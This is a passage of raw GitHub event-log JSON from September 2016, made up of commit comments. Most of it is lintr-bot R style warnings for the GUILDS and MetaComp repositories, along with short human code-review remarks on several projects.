^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:21:22:](https://github.com/seninp-bioinfo/MetaComp/blob/097b747e3a2d60fd6f4fbc59b42b7144a33cbee0/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L21) *style:* **Commas should always have a space after.**\n```r\n​expect_that(sum(dat[,1]), equals(1.0))\n                     ^\n```\n[tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R:26:13:](https://github.com/seninp-bioinfo/MetaComp/blob/097b747e3a2d60fd6f4fbc59b42b7144a33cbee0/tests/testthat/test_convert_merge_table_to_phyloseq_otu_table.R#L26) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​expect_that(convert_merge_table_to_phyloseq_otu_table(\"../test_data/merged_table.tsv\",\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-21T17:59:53Z"}
{"id":"4597918453","type":"CommitCommentEvent","actor":{"login":"DemonWav"},"repo":{"name":"DemonWav/MinecraftDev"},"payload":{"comment":{"id":19117945,"position":3,"line":3,"path":"src/main/resources/fileTemplates/j2ee/forge_gradle.properties.ft","commit_id":"54a0a12da105caff16886ae08fb6e2ba1c2b0095","created_at":"2016-09-21T18:01:58Z","updated_at":"2016-09-21T18:01:58Z","body":"No, they both come as a group, so checking for one is sufficient for both."}},"created_at":"2016-09-21T18:01:58Z"}
{"id":"4597920406","type":"CommitCommentEvent","actor":{"login":"adsharma"},"repo":{"name":"adsharma/flatbuffers"},"payload":{"comment":{"id":19117949,"position":6,"line":56,"path":"include/flatbuffers/idl.h","commit_id":"51f46e430b39fe9a0cc0817918e2cb3b5e72b8d7","created_at":"2016-09-21T18:02:17Z","updated_at":"2016-09-21T18:02:17Z","body":"Sounds good. I'll keep everything in an open source fork for now. We can revisit if other key value store users want this functionality."}},"created_at":"2016-09-21T18:02:17Z"}
{"id":"4597925953","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/training.plone.org"},"payload":{"comment":{"id":19117962,"position":null,"line":null,"path":null,"commit_id":"5206b8f44396b9d33923f3ff7769a9cd42a15cf7","created_at":"2016-09-21T18:03:17Z","updated_at":"2016-09-21T18:03:17Z","body":"@gitter-badger you need to sign Plone Contributor Agreement in order to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html"}},"created_at":"2016-09-21T18:03:17Z"}
{"id":"4597931373","type":"CommitCommentEvent","actor":{"login":"qiluo-msft"},"repo":{"name":"Azure/sonic-swss"},"payload":{"comment":{"id":19117978,"position":6,"line":23,"path":"orchagent/portsorch.h","commit_id":"159728a4e1fc5e2fb05d04ba85cd99a6df0fab66","created_at":"2016-09-21T18:04:16Z","updated_at":"2016-09-21T18:04:16Z","body":"Why remove parameter names? Not consistent with setPort()"}},"created_at":"2016-09-21T18:04:16Z"}
{"id":"4597937191","type":"CommitCommentEvent","actor":{"login":"VitaliyGuz"},"repo":{"name":"SwanCourses/Guz-Vitaliy"},"payload":{"comment":{"id":19117992,"position":1,"line":1,"path":"client/modules/Post/components/PostList.css","commit_id":"1dd3754f513cf02d715ab5b398cd06c5cd169777","created_at":"2016-09-21T18:05:21Z","updated_at":"2016-09-21T18:05:21Z","body":"Я сделал чтоб компоненты <PostListItem> отображались в 3 колонки. Для этого мне нужно чтоб <div> с классом _listView_ отображался как flex."}},"created_at":"2016-09-21T18:05:21Z"}
{"id":"4597937508","type":"CommitCommentEvent","actor":{"login":"DaMatrix"},"repo":{"name":"DaMatrix/Genisys2p2e"},"payload":{"comment":{"id":19117996,"position":14,"line":85,"path":"plugins/NetherChests_src/src/aliuly/nechest/MySqlMgr.php","commit_id":"e12cd6b8c9987e7e9f6e785be3834a9d9b027c51","created_at":"2016-09-21T18:05:24Z","updated_at":"2016-09-21T18:05:24Z","body":"no more spammmmmmm"}},"created_at":"2016-09-21T18:05:24Z"}
{"id":"4597938317","type":"CommitCommentEvent","actor":{"login":"DaMatrix"},"repo":{"name":"DaMatrix/Genisys2p2e"},"payload":{"comment":{"id":19117997,"position":5,"line":62,"path":"plugins/NetherChests_src/src/aliuly/nechest/MySqlMgr.php","commit_id":"e12cd6b8c9987e7e9f6e785be3834a9d9b027c51","created_at":"2016-09-21T18:05:33Z","updated_at":"2016-09-21T18:05:33Z","body":"no more dupe"}},"created_at":"2016-09-21T18:05:33Z"}
{"id":"4597944545","type":"CommitCommentEvent","actor":{"login":"marrbnl"},"repo":{"name":"rnc-lbl/star-picoDst"},"payload":{"comment":{"id":19118012,"position":null,"line":null,"path":null,"commit_id":"09559f08c5e013696e241e8484ab842234b569ff","created_at":"2016-09-21T18:06:39Z","updated_at":"2016-09-21T18:06:39Z","body":"Hello Mustafa\r\n\r\nI submitted another pull request to add a default mode to choose the first vertex. Since you changed the structure, can you add this mode in your current version? Thanks"}},"created_at":"2016-09-21T18:06:39Z"}
{"id":"4597949747","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":19118027,"position":23,"line":23,"path":"app/controllers/add-edit-controller.js","commit_id":"055f157e940a97b3fc9f0f33310a117ad70f3f0d","created_at":"2016-09-21T18:07:38Z","updated_at":"2016-09-21T18:07:38Z","body":"$http нужно убрать в сервисы"}},"created_at":"2016-09-21T18:07:38Z"}
{"id":"4597955985","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":19118039,"position":10,"line":10,"path":"app/controllers/add-edit-controller.js","commit_id":"055f157e940a97b3fc9f0f33310a117ad70f3f0d","created_at":"2016-09-21T18:08:30Z","updated_at":"2016-09-21T18:08:30Z","body":"Плохая практика делать jquery в контроллере, нужно завернуть плагин в директиву и добавить ее в темплейте."}},"created_at":"2016-09-21T18:08:30Z"}
{"id":"4597957075","type":"CommitCommentEvent","actor":{"login":"lots0logs"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19118045,"position":null,"line":null,"path":null,"commit_id":"62b93afbecf09ceee2db01a9465c787769d6280d","created_at":"2016-09-21T18:08:42Z","updated_at":"2016-09-21T18:08:42Z","body":"@khurshid-alam That would explain why I couldnt reproduce the Xfxe issue!\r\n\r\n![homer-simpson-doh](https://cloud.githubusercontent.com/assets/4675662/18722987/73a954de-7ffc-11e6-930f-effb24aa0863.gif)\r\n"}},"created_at":"2016-09-21T18:08:42Z"}
{"id":"4597965905","type":"CommitCommentEvent","actor":{"login":"khurshid-alam"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19118072,"position":null,"line":null,"path":null,"commit_id":"62b93afbecf09ceee2db01a9465c787769d6280d","created_at":"2016-09-21T18:10:17Z","updated_at":"2016-09-21T18:10:17Z","body":"@lots0logs Already fixed it. :)"}},"created_at":"2016-09-21T18:10:17Z"}
{"id":"4597965974","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":19118074,"position":13,"line":13,"path":"app/controllers/add-edit-controller.js","commit_id":"055f157e940a97b3fc9f0f33310a117ad70f3f0d","created_at":"2016-09-21T18:10:18Z","updated_at":"2016-09-21T18:10:18Z","body":"1. Довольно странное решение проверки состояния формы.\r\n2. У тебя уже заинжекчено $window, нужно его и использовать."}},"created_at":"2016-09-21T18:10:18Z"}
{"id":"4597966218","type":"CommitCommentEvent","actor":{"login":"jbduncan"},"repo":{"name":"google/guava"},"payload":{"comment":{"id":19118076,"position":null,"line":null,"path":null,"commit_id":"cb3a29fb67936c2bc52b1cfee08cedab62950282","created_at":"2016-09-21T18:10:20Z","updated_at":"2016-09-21T18:10:20Z","body":"I assume the RegularImmutableList(Object[], int, int) constructor wasn't actually being used anywhere before this commit? If so, this seems like a rather sensible thing to do."}},"created_at":"2016-09-21T18:10:20Z"}
{"id":"4597968709","type":"CommitCommentEvent","actor":{"login":"MustafaMustafa"},"repo":{"name":"rnc-lbl/star-picoDst"},"payload":{"comment":{"id":19118085,"position":null,"line":null,"path":null,"commit_id":"09559f08c5e013696e241e8484ab842234b569ff","created_at":"2016-09-21T18:10:47Z","updated_at":"2016-09-21T18:10:47Z","body":"@marrbnl \r\nSure, I will do that. Thank you for adding the default mode."}},"created_at":"2016-09-21T18:10:47Z"}
{"id":"4597973922","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":19118102,"position":14,"line":14,"path":"app/controllers/login-controller.js","commit_id":"055f157e940a97b3fc9f0f33310a117ad70f3f0d","created_at":"2016-09-21T18:11:42Z","updated_at":"2016-09-21T18:11:42Z","body":"Что такое `showMsg`? Нужно называть переменную, чтобы из названия было понятно, за что она отвечает."}},"created_at":"2016-09-21T18:11:42Z"}
{"id":"4597974364","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19118103,"position":null,"line":null,"path":null,"commit_id":"17582a74f072206095634f02c583406e50bb9fc6","created_at":"2016-09-21T18:11:46Z","updated_at":"2016-09-21T18:11:46Z","body":"[R/calcSumKDA2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcSumKDA2 <- function(S,N,I,theta,KDA)\n^~~~~~~~~~~\n```\n[R/calcSumKDA2.R:1:27:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L1) *style:* **Commas should always have a space after.**\n```r\n​calcSumKDA2 <- function(S,N,I,theta,KDA)\n                          ^\n```\n[R/calcSumKDA2.R:1:29:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L1) *style:* **Commas should always have a space after.**\n```r\n​calcSumKDA2 <- function(S,N,I,theta,KDA)\n                            ^\n```\n[R/calcSumKDA2.R:1:31:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L1) *style:* **Commas should always have a space after.**\n```r\n​calcSumKDA2 <- function(S,N,I,theta,KDA)\n                              ^\n```\n[R/calcSumKDA2.R:1:37:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L1) *style:* **Commas should always have a space after.**\n```r\n​calcSumKDA2 <- function(S,N,I,theta,KDA)\n                                    ^\n```\n[R/calcSumKDA2.R:2:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L2) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[R/calcSumKDA2.R:3:11:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L3) *style:* **Use <-, not =, for assignment.**\n```r\n​  numbers = S:N;\n          ^\n```\n[R/calcSumKDA2.R:4:5:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L4) *style:* **Use <-, not =, for assignment.**\n```r\n​  s = length(I);\n    ^\n```\n[R/calcSumKDA2.R:5:11:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L5) *style:* **Use <-, not =, for assignment.**\n```r\n​  results = matrix(0,nrow=s,ncol=1);\n          ^\n```\n[R/calcSumKDA2.R:5:22:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L5) *style:* **Commas should always have a space after.**\n```r\n​  results = matrix(0,nrow=s,ncol=1);\n                     ^\n```\n[R/calcSumKDA2.R:5:26:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​  results = matrix(0,nrow=s,ncol=1);\n                        ~^~\n```\n[R/calcSumKDA2.R:5:29:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L5) *style:* **Commas should always have a space after.**\n```r\n​  results = matrix(0,nrow=s,ncol=1);\n                            ^\n```\n[R/calcSumKDA2.R:5:33:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​  results = matrix(0,nrow=s,ncol=1);\n                               ~^~\n```\n[R/calcSumKDA2.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L6) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/calcSumKDA2.R:7:6:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L7) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in 1:s) {\n     ^\n```\n[R/calcSumKDA2.R:8:14:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L8) *style:* **Use <-, not =, for assignment.**\n```r\n​    outcomes = KDA[numbers+1] + (log(I[i]) * numbers)  -\n             ^\n```\n[R/calcSumKDA2.R:8:27:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​    outcomes = KDA[numbers+1] + (log(I[i]) * numbers)  -\n                         ~^~\n```\n[R/calcSumKDA2.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t(lgamma(theta + numbers) - lgamma(theta)) ;\n^\n```\n[R/calcSumKDA2.R:9:9:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L9) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t(lgamma(theta + numbers) - lgamma(theta)) ;\n        ^\n```\n[R/calcSumKDA2.R:9:23:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\t(lgamma(theta + numbers) - lgamma(theta)) ;\n                     ~^~\n```\n[R/calcSumKDA2.R:9:34:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\t(lgamma(theta + numbers) - lgamma(theta)) ;\n                                ~^~\n```\n[R/calcSumKDA2.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[R/calcSumKDA2.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L10) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/calcSumKDA2.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tlog_max = max(outcomes);\n^\n```\n[R/calcSumKDA2.R:11:17:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L11) *style:* **Use <-, not =, for assignment.**\n```r\n​\tlog_max = max(outcomes);\n                ^\n```\n[R/calcSumKDA2.R:11:17:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\tlog_max = max(outcomes);\n               ~^~\n```\n[R/calcSumKDA2.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tsumlist = sum( exp(outcomes - log_max));\n^\n```\n[R/calcSumKDA2.R:12:17:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L12) *style:* **Use <-, not =, for assignment.**\n```r\n​\tsumlist = sum( exp(outcomes - log_max));\n                ^\n```\n[R/calcSumKDA2.R:12:17:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\tsumlist = sum( exp(outcomes - log_max));\n                ^~\n```\n[R/calcSumKDA2.R:12:37:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\tsumlist = sum( exp(outcomes - log_max));\n                                   ~^~\n```\n[R/calcSumKDA2.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[R/calcSumKDA2.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L13) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/calcSumKDA2.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tresults[i] = log_max + log(sumlist); \n^\n```\n[R/calcSumKDA2.R:14:20:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L14) *style:* **Use <-, not =, for assignment.**\n```r\n​\tresults[i] = log_max + log(sumlist); \n                   ^\n```\n[R/calcSumKDA2.R:14:20:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\tresults[i] = log_max + log(sumlist); \n                  ~^~\n```\n[R/calcSumKDA2.R:14:30:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\tresults[i] = log_max + log(sumlist); \n                            ~^~\n```\n[R/calcSumKDA2.R:14:38:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L14) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tresults[i] = log_max + log(sumlist); \n                                     ^\n```\n[R/calcSumKDA2.R:17:10:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/calcSumKDA2.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  return((results));\n         ^\n```\n[R/Condition.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateCondLik <- function(v,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:1:31:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L1) *style:* **Commas should always have a space after.**\n```r\n​evaluateCondLik <- function(v,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) {\n                              ^\n```\n[R/Condition.R:1:39:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L1) *style:* **Commas should always have a space after.**\n```r\n​evaluateCondLik <- function(v,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) {\n                                      ^\n```\n[R/Condition.R:1:47:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L1) *style:* **Commas should always have a space after.**\n```r\n​evaluateCondLik <- function(v,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) {\n                                              ^\n```\n[R/Condition.R:1:55:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L1) *style:* **Commas should always have a space after.**\n```r\n​evaluateCondLik <- function(v,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) {\n                                                      ^\n```\n[R/Condition.R:1:63:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L1) *style:* **Commas should always have a space after.**\n```r\n​evaluateCondLik <- function(v,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) {\n                                                              ^\n```\n[R/Condition.R:1:66:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L1) *style:* **Commas should always have a space after.**\n```r\n​evaluateCondLik <- function(v,theta_x,theta_y,alpha_x,alpha_y,Nx,Ny) {\n                                                                 ^\n```\n[R/Condition.R:2:6:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L2) *style:* **Use <-, not =, for assignment.**\n```r\n​  nx = v;\n     ^\n```\n[R/Condition.R:3:6:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L3) *style:* **Use <-, not =, for assignment.**\n```r\n​  ny = 1-nx;\n     ^\n```\n[R/Condition.R:3:9:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​  ny = 1-nx;\n       ~^~\n```\n[R/Condition.R:4:5:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L4) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = Nx+Ny;\n    ^\n```\n[R/Condition.R:4:9:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L4) *style:* **Put spaces around all infix operators.**\n```r\n​  J = Nx+Ny;\n       ~^~\n```\n[R/Condition.R:5:7:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L5) *style:* **Use <-, not =, for assignment.**\n```r\n​  I_X = alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny);\n      ^\n```\n[R/Condition.R:5:26:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X = alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny);\n                        ~^~\n```\n[R/Condition.R:6:7:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L6) *style:* **Use <-, not =, for assignment.**\n```r\n​  I_Y = alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny);\n      ^\n```\n[R/Condition.R:6:26:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y = alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny);\n                        ~^~\n```\n[R/Condition.R:8:5:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L8) *style:* **Use <-, not =, for assignment.**\n```r\n​  a = lgamma(J+1);\n    ^\n```\n[R/Condition.R:8:15:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​  a = lgamma(J+1);\n             ~^~\n```\n[R/Condition.R:9:5:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L9) *style:* **Use <-, not =, for assignment.**\n```r\n​  b = rep(0,length(I_X));\n    ^\n```\n[R/Condition.R:9:13:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L9) *style:* **Commas should always have a space after.**\n```r\n​  b = rep(0,length(I_X));\n            ^\n```\n[R/Condition.R:10:10:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​  poch_X = rep(0,length(I_X));\n         ^\n```\n[R/Condition.R:10:18:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L10) *style:* **Commas should always have a space after.**\n```r\n​  poch_X = rep(0,length(I_X));\n                 ^\n```\n[R/Condition.R:11:10:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L11) *style:* **Use <-, not =, for assignment.**\n```r\n​  poch_Y = rep(0,length(I_X));\n         ^\n```\n[R/Condition.R:11:18:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L11) *style:* **Commas should always have a space after.**\n```r\n​  poch_Y = rep(0,length(I_X));\n                 ^\n```\n[R/Condition.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L12) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:13:6:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L13) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(cnt in 1:length(I_X)) {\n     ^\n```\n[R/Condition.R:14:12:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L14) *style:* **Use <-, not =, for assignment.**\n```r\n​    b[cnt] = lgamma(I_X[cnt] + I_Y[cnt] + J) - lgamma(I_X[cnt] + I_Y[cnt]);\n           ^\n```\n[R/Condition.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpoch_X[cnt] = lgamma(I_X[cnt] + Nx) - lgamma(I_X[cnt]);\n^\n```\n[R/Condition.R:15:21:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L15) *style:* **Use <-, not =, for assignment.**\n```r\n​\tpoch_X[cnt] = lgamma(I_X[cnt] + Nx) - lgamma(I_X[cnt]);\n                    ^\n```\n[R/Condition.R:15:21:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L15) *style:* **Put spaces around all infix operators.**\n```r\n​\tpoch_X[cnt] = lgamma(I_X[cnt] + Nx) - lgamma(I_X[cnt]);\n                   ~^~\n```\n[R/Condition.R:15:39:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L15) *style:* **Put spaces around all infix operators.**\n```r\n​\tpoch_X[cnt] = lgamma(I_X[cnt] + Nx) - lgamma(I_X[cnt]);\n                                     ~^~\n```\n[R/Condition.R:15:45:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L15) *style:* **Put spaces around all infix operators.**\n```r\n​\tpoch_X[cnt] = lgamma(I_X[cnt] + Nx) - lgamma(I_X[cnt]);\n                                           ~^~\n```\n[R/Condition.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpoch_Y[cnt] = lgamma(I_Y[cnt] + Ny) - lgamma(I_Y[cnt]);\n^\n```\n[R/Condition.R:16:21:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L16) *style:* **Use <-, not =, for assignment.**\n```r\n​\tpoch_Y[cnt] = lgamma(I_Y[cnt] + Ny) - lgamma(I_Y[cnt]);\n                    ^\n```\n[R/Condition.R:16:21:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L16) *style:* **Put spaces around all infix operators.**\n```r\n​\tpoch_Y[cnt] = lgamma(I_Y[cnt] + Ny) - lgamma(I_Y[cnt]);\n                   ~^~\n```\n[R/Condition.R:16:39:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L16) *style:* **Put spaces around all infix operators.**\n```r\n​\tpoch_Y[cnt] = lgamma(I_Y[cnt] + Ny) - lgamma(I_Y[cnt]);\n                                     ~^~\n```\n[R/Condition.R:16:45:](https://github.com/thijsjanzen/GUILDS/blob/17582a74f072206095634f02c583406e50bb9fc6/R/Condition.R#L16) *style:* **Put spaces around all infix 